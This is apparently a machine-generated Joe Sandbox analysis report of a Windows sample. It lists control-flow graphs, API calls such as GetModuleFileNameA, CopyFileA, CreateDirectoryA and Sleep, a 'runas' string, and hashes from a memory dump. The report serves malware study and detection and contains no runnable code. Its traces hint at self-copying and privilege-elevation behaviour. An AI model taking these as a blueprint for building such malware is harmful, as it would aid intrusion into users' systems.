20128->20130 20131 1065688 20129->20131 20133 1062299 20130->20133 20134 105b4a2 __dosmaperr 14 API calls 20131->20134 20132->20133 20135 1065367 20132->20135 20139 1065396 20132->20139 20133->20075 20186 1064c7e 20133->20186 20136 1065374 20134->20136 20137 105b48f __dosmaperr 14 API calls 20135->20137 20140 105b97e ___std_exception_copy 25 API calls 20136->20140 20138 106536c 20137->20138 20141 105b4a2 __dosmaperr 14 API calls 20138->20141 20142 10653af 20139->20142 20143 1065406 20139->20143 20144 10653ca 20139->20144 20140->20133 20141->20136 20142->20144 20178 10653b4 20142->20178 20146 105d7ea __wsopen_s 15 API calls 20143->20146 20145 105b48f __dosmaperr 14 API calls 20144->20145 20147 10653cf 20145->20147 20148 106541d 20146->20148 20149 105b4a2 __dosmaperr 14 API calls 20147->20149 20151 105d301 _free 14 API calls 20148->20151 20152 10653d6 20149->20152 20150 1063fad __wsopen_s 25 API calls 20153 106555d 20150->20153 20154 1065426 20151->20154 20155 105b97e ___std_exception_copy 25 API calls 20152->20155 20156 10655d3 20153->20156 20159 1065576 GetConsoleMode 20153->20159 20157 105d301 _free 14 API calls 20154->20157 20185 10653e1 __wsopen_s 20155->20185 20158 10655d7 ReadFile 20156->20158 20160 106542d 20157->20160 20161 10655f1 20158->20161 20162 106564b GetLastError 20158->20162 20159->20156 20163 1065587 20159->20163 20165 1065437 20160->20165 20166 1065452 20160->20166 20161->20162 20169 10655c8 20161->20169 20167 10655af 20162->20167 20168 1065658 20162->20168 20163->20158 20164 106558d ReadConsoleW 20163->20164 20164->20169 20170 10655a9 GetLastError 20164->20170 20172 105b4a2 __dosmaperr 14 API calls 20165->20172 20174 106571e __wsopen_s 27 API calls 20166->20174 20175 105b46c __dosmaperr 14 API calls 20167->20175 20167->20185 20173 105b4a2 __dosmaperr 14 API calls 20168->20173 20179 1065616 20169->20179 20180 106562d 20169->20180 20169->20185 20170->20167 20171 105d301 _free 14 API calls 20171->20133 20176 106543c 20172->20176 20177 106565d 20173->20177 20174->20178 20175->20185 20181 105b48f __dosmaperr 14 API calls 20176->20181 20182 105b48f __dosmaperr 14 API calls 20177->20182 20178->20150 20221 1065120 20179->20221 20180->20185 20234 1064f4f 20180->20234 20181->20185 20182->20185 20185->20171 20244 1064c31 20186->20244 20188 1064dcd 20189 105b4a2 __dosmaperr 14 API calls 20188->20189 20220 1064d53 20189->20220 20191 1064d7f 20193 106571e __wsopen_s 27 API calls 20191->20193 20191->20220 20192 1064cd4 20195 105f5d6 _unexpected 14 API calls 20192->20195 20194 1064d97 20193->20194 20194->20188 20199 105edd1 __wsopen_s 25 API calls 20194->20199 20197 1064ce0 20195->20197 20196 106571e __wsopen_s 27 API calls 20198 1064de4 20196->20198 20200 1064cf5 __wsopen_s 20197->20200 20201 1064ce8 20197->20201 20198->20075 20202 1064da7 SetEndOfFile 20199->20202 20210 1063015 __wsopen_s 60 API calls 20200->20210 20213 1064d5a 20200->20213 20216 1064d44 __wsopen_s 20200->20216 20203 105b4a2 __dosmaperr 14 API calls 20201->20203 20204 1064db3 20202->20204 20202->20220 20218 1064ced 20203->20218 20205 105b4a2 __dosmaperr 14 API calls 20204->20205 20206 1064db8 20205->20206 20208 105b48f __dosmaperr 14 API calls 20206->20208 20207 105b4a2 __dosmaperr 14 API calls 20209 1064d74 20207->20209 20211 1064dc3 GetLastError 20208->20211 20212 105d301 _free 14 API calls 20209->20212 20210->20200 20211->20188 20212->20220 20214 105b48f __dosmaperr 14 API calls 20213->20214 20215 1064d5f 20214->20215 20217 105b4a2 __dosmaperr 14 API calls 20215->20217 20215->20218 20219 105d301 _free 14 API calls 20216->20219 20217->20218 20218->20207 20219->20220 20220->20196 20239 1064dee 20221->20239 20223 105d838 __fassign MultiByteToWideChar 20225 1065234 20223->20225 20228 106523d GetLastError 20225->20228 20232 1065168 20225->20232 20226 10651c2 20230 106517c 20226->20230 20233 106571e __wsopen_s 27 API calls 20226->20233 20227 10651b2 20229 105b4a2 __dosmaperr 14 API calls 20227->20229 20231 105b46c __dosmaperr 14 API calls 20228->20231 20229->20232 20230->20223 20231->20232 20232->20185 20233->20230 20236 1064f8a 20234->20236 20235 10650f2 20235->20185 20236->20235 20237 106501b ReadFile 20236->20237 20238 106571e __wsopen_s 27 API calls 20236->20238 20237->20236 20238->20236 20242 1064e22 20239->20242 20240 1064f29 20240->20226 20240->20227 20240->20230 20240->20232 20241 1064e91 ReadFile 20241->20242 20242->20240 20242->20241 20243 106571e __wsopen_s 27 API calls 20242->20243 20243->20242 20245 106571e __wsopen_s 27 API calls 20244->20245 20246 1064c4a 20245->20246 20247 106571e __wsopen_s 27 API calls 20246->20247 20248 1064c59 20247->20248 20248->20188 20248->20191 20248->20192 20249->19969

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0105DCAE,?,0105A650,0105ABD6,?,0105DCAE,0105ABD6,0105DCAE), ref: 0105A673
                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0105A650,0105ABD6,?,0105DCAE,0105ABD6,0105DCAE), ref: 0105A67A
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0105A68C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                      • Opcode ID: 609afd060c1ac237036a1c6c1f323cc83ab434fc048ec2ab7cb8589a5a7f12f0
                                                                                                                                                                                      • Instruction ID: ffbeb0c4f921b396db606d603366f556c9c2461f8019c17911f45e51aff34104
                                                                                                                                                                                      • Opcode Fuzzy Hash: 609afd060c1ac237036a1c6c1f323cc83ab434fc048ec2ab7cb8589a5a7f12f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE04631100208EFCFA2AF18C908A8A3FA8EB84641B054914F8858F130CB3AE981DBA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00017731,01057427), ref: 0105772A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                      • Opcode ID: 9da478e5d9df73b783990d9823593fc068f347daa47036848a7a5c560dee9a14
                                                                                                                                                                                      • Instruction ID: 2d4edf18c4dab153dd998e8a1fe87ff8260541362716c53e87c90c564cf6bab6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9da478e5d9df73b783990d9823593fc068f347daa47036848a7a5c560dee9a14
                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(01079708,00000FA0,?,?,01056CD8), ref: 01056D06
                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01056CD8), ref: 01056D11
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01056CD8), ref: 01056D22
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 01056D34
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 01056D42
                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01056CD8), ref: 01056D65
                                                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 01056D76
                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(01079708,00000007,?,?,01056CD8), ref: 01056D81
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,01056CD8), ref: 01056D91
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 01056D0C
                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 01056D3A
                                                                                                                                                                                      • kernel32.dll, xrefs: 01056D1D
                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 01056D2E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                                                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                      • API String ID: 3578986977-3242537097
                                                                                                                                                                                      • Opcode ID: dd3cb2624afd2f724726c04d29e1df4554c355ceedd36dc5647274395f6b5362
                                                                                                                                                                                      • Instruction ID: c91e2c33436a1724949a958a8680c318302ec2eb5e631c37edb70abdbeeba824
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd3cb2624afd2f724726c04d29e1df4554c355ceedd36dc5647274395f6b5362
                                                                                                                                                                                      • Instruction Fuzzy Hash: E8019279E41301ABEB71AF79EC09A967AE8EB44B517000454FEC5EA158FA6B8440C771
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0106201A: CreateFileW.KERNELBASE(00000000,00000000,?,0106240A,?,?,00000000,?,0106240A,00000000,0000000C), ref: 01062037
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 01062475
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0106247C
                                                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 01062488
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 01062492
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0106249B
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 010624BB
                                                                                                                                                                                      • CloseHandle.KERNEL32(0105D19E), ref: 01062608
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0106263A
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 01062641
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                                      • Opcode ID: 34d77b1852677a98c4aa4990ee33d8aceeff962e8d0efd8a53275d93374720d6
                                                                                                                                                                                      • Instruction ID: e143ae21f696d74ff63ebd02485373f731d6a53c89bcc6d4796a15f1541bab3e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 34d77b1852677a98c4aa4990ee33d8aceeff962e8d0efd8a53275d93374720d6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AA13632A001559FDF29EF6CD8507EE3BF5AB0A324F144199F881EF291CB399912CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 81 1049d3c-1049d4b 82 1049d61-1049d93 call 1057335 81->82 83 1049d4d-1049d5b 81->83 91 1049dc4-1049e3a call 1055760 call 1042be0 call 1055f90 call 1055c10 82->91 92 1049d95-1049da4 82->92 83->82 84 104a135 call 105b98e 83->84 89 104a13a call 105b98e 84->89 93 104a13f-104a16c call 1055640 * 2 CopyFileA call 1045000 89->93 115 1049e3c-1049e4b 91->115 116 1049e6b-1049e93 91->116 94 1049da6-1049db4 92->94 95 1049dba-1049dc1 call 1057335 92->95 112 104a1bd-104a1bf call 105a74f 93->112 113 104a16e-104a1ba call 1055720 call 1055760 call 1055720 call 1043990 93->113 94->84 94->95 95->91 118 104a1c4-104a1c9 call 105b98e 112->118 113->112 119 1049e61-1049e68 call 1057335 115->119 120 1049e4d-1049e5b 115->120 121 1049ec4-1049f10 GetModuleFileNameA 116->121 122 1049e95-1049ea4 116->122 119->116 120->89 120->119 129 1049f17-1049f1c 121->129 126 1049ea6-1049eb4 122->126 127 1049eba-1049ec1 call 1057335 122->127 126->89 126->127 127->121 129->129 130 1049f1e-1049f4a call 1055ac0 call 10560e0 129->130 144 104a037-104a040 130->144 145 1049f50-1049f74 call 105a81c 130->145 147 104a071-104a095 144->147 148 104a042-104a051 144->148 158 1049f76-1049f99 call 105a8aa call 105ab37 145->158 159 1049f9c-1049fc0 call 105a81c 145->159 152 104a0c6-104a0ea 147->152 153 104a097-104a0a6 147->153 150 104a067-104a06e call 1057335 148->150 151 104a053-104a061 148->151 150->147 151->118 151->150 156 104a0ec-104a0fb 152->156 157 104a11b-104a134 call 1056cc2 152->157 154 104a0bc-104a0c3 call 1057335 153->154 155 104a0a8-104a0b6 153->155 154->152 155->118 155->154 162 104a111-104a118 call 1057335 156->162 163 104a0fd-104a10b 156->163 158->159 173 1049fd0-1049ff0 GetFileAttributesA 159->173 174 1049fc2-1049fcb call 105a8aa 159->174 162->157 163->118 163->162 178 1049ff6-104a00d CreateDirectoryA 173->178 179 1049ff2-1049ff4 173->179 174->112 182 104a013-104a02d GetFileAttributesA 178->182 179->178 179->182 182->144 183 104a02f-104a031 182->183 183->93 183->144
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01049EED
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?), ref: 01049FEB
                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 0104A00D
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?), ref: 0104A028
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0104A159
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Attributes$CopyCreateDirectoryModuleName
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3597215635-0
                                                                                                                                                                                      • Opcode ID: 601492f1b02b2f31b216a9a9f77b58b2fabf75cfd075550f9ed980b634c575cd
                                                                                                                                                                                      • Instruction ID: efd556d920ececc99e1a83aa91fe04b375c39bae3eef57f35676eea1ff0eedb0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 601492f1b02b2f31b216a9a9f77b58b2fabf75cfd075550f9ed980b634c575cd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 02B126F1A001188BEB64DB24CC857DEBB75AB55314F4041ECEA89A72C2DB355EC4CF65
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 184 1043e80-1043ee0 call 1055f90 call 1055d10 189 1043ee2-1043eee 184->189 190 1043f0e-1043f8a call 1055760 * 2 call 1042be0 call 1055ac0 call 1043990 184->190 192 1043f04-1043f0b call 1057335 189->192 193 1043ef0-1043efe 189->193 215 1043f8c-1043f98 190->215 216 1043fb8-1043fbe 190->216 192->190 193->192 195 1044047 call 105b98e 193->195 200 104404c-104411a call 105b98e call 1055760 call 1042be0 call 1055d10 call 1055760 call 1042be0 call 1055ac0 call 1043990 195->200 245 1044144-1044155 Sleep 200->245 246 104411c-1044128 200->246 220 1043fae-1043fb5 call 1057335 215->220 221 1043f9a-1043fa8 215->221 217 1043fc0-1043fcc 216->217 218 1043fe8-1044000 216->218 222 1043fde-1043fe5 call 1057335 217->222 223 1043fce-1043fdc 217->223 224 1044002-104400e 218->224 225 104402a-1044046 call 1056cc2 218->225 220->216 221->200 221->220 222->218 223->200 223->222 229 1044020-1044027 call 1057335 224->229 230 1044010-104401e 224->230 229->225 230->200 230->229 249 1044157-1044163 245->249 250 104417f-1044198 call 1056cc2 245->250 247 104413a-1044141 call 1057335 246->247 248 104412a-1044138 246->248 247->245 248->247 251 1044199 call 105b98e 248->251 253 1044175-104417c call 1057335 249->253 254 1044165-1044173 249->254 259 104419e-10441ef call 105b98e call 10435d0 251->259 253->250 254->253 254->259 266 10441f1 259->266 267 10441f3-1044200 SetCurrentDirectoryA 259->267 266->267 268 1044202-104420e 267->268 269 104422e-10442e8 call 1055760 call 1042be0 call 1055760 call 1042be0 call 1055d10 call 1055c10 call 1055760 call 1042be0 call 1055ac0 call 1043990 267->269 271 1044224-104422b call 1057335 268->271 272 1044210-104421e 268->272 301 1044316-104432e 269->301 302 10442ea-10442f6 269->302 271->269 272->271 274 10443e8 call 105b98e 272->274 279 10443ed call 105b98e 274->279 283 10443f2-10443f7 call 105b98e 279->283 305 1044330-104433c 301->305 306 104435c-1044374 301->306 303 104430c-1044313 call 1057335 302->303 304 10442f8-1044306 302->304 303->301 304->279 304->303 310 1044352-1044359 call 1057335 305->310 311 104433e-104434c 305->311 307 1044376-1044382 306->307 308 104439e-10443a4 306->308 312 1044394-104439b call 1057335 307->312 313 1044384-1044392 307->313 314 10443a6-10443b2 308->314 315 10443ce-10443e7 call 1056cc2 308->315 310->306 311->279 311->310 312->308 313->279 313->312 319 10443c4-10443cb call 1057335 314->319 320 10443b4-10443c2 314->320 319->315 320->283 320->319
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 01044149
                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,B75E99D0), ref: 010441F4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentDirectorySleep
                                                                                                                                                                                      • String ID: runas
                                                                                                                                                                                      • API String ID: 16921501-4000483414
                                                                                                                                                                                      • Opcode ID: e2565a1c58b383d1d5f59c4c5132210e329b20be2e68a514af73dbfb08b34ed3
                                                                                                                                                                                      • Instruction ID: 47d84b88b09a3b8513fb8f80a756bc3599155d620520f5636d1bc5b6b05a85d6
                                                                                                                                                                                      • Opcode Fuzzy Hash: e2565a1c58b383d1d5f59c4c5132210e329b20be2e68a514af73dbfb08b34ed3
                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE128B1A00244ABEB18EB78CD857DEBF72EF51710F54865CE881AB3C5DB359A40C792
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 327 105d454-105d468 call 105edd1 330 105d46e-105d476 327->330 331 105d46a-105d46c 327->331 333 105d481-105d484 330->333 334 105d478-105d47f 330->334 332 105d4bc-105d4dc call 105ed40 331->332 342 105d4de-105d4e8 call 105b46c 332->342 343 105d4ea 332->343 337 105d486-105d48a 333->337 338 105d4a2-105d4b2 call 105edd1 FindCloseChangeNotification 333->338 334->333 336 105d48c-105d4a0 call 105edd1 * 2 334->336 336->331 336->338 337->336 337->338 338->331 346 105d4b4-105d4ba GetLastError 338->346 348 105d4ec-105d4ef 342->348 343->348 346->332
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,01045020,?,0105D382,01045020,010769C8,0000000C,0105D434,010768E8), ref: 0105D4AA
                                                                                                                                                                                      • GetLastError.KERNEL32(?,0105D382,01045020,010769C8,0000000C,0105D434,010768E8), ref: 0105D4B4
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0105D4DF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 490808831-0
                                                                                                                                                                                      • Opcode ID: c1fed647df1c5462a3528539acf1770e69a6f988b058b606a9af0516e0c99261
                                                                                                                                                                                      • Instruction ID: 649ad1d4c92a18d940d2022b8af2c2bb45217f72cfae7843df76bb19ad1cc2e1
                                                                                                                                                                                      • Opcode Fuzzy Hash: c1fed647df1c5462a3528539acf1770e69a6f988b058b606a9af0516e0c99261
                                                                                                                                                                                      • Instruction Fuzzy Hash: 99010832A0021017E7F172FCD8857EF6FC98B92734F29059AEDC5871C2DE65E4818B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 360 105e348-105e358 DeleteFileW 361 105e36c-105e36f 360->361 362 105e35a-105e36b GetLastError call 105b46c 360->362
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DeleteFileW.KERNELBASE(0105AB8A,?,0105AB8A,?), ref: 0105E350
                                                                                                                                                                                      • GetLastError.KERNEL32(?,0105AB8A,?), ref: 0105E35A
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0105E361
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DeleteErrorFileLast__dosmaperr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1545401867-0
                                                                                                                                                                                      • Opcode ID: a0fea0a8c9c7058c93f0ca593d82bc0274e9045b5a253d22a5ac3131371328b0
                                                                                                                                                                                      • Instruction ID: da3a5fd5397477e5e1de1c45b31302d17d9603cc7cc6654073e2df4b26c1bb30
                                                                                                                                                                                      • Opcode Fuzzy Hash: a0fea0a8c9c7058c93f0ca593d82bc0274e9045b5a253d22a5ac3131371328b0
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D02232000208BBCB602FF6FC0C4073F8CAA812303004210F9ACC80B1DE36E4808A10
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
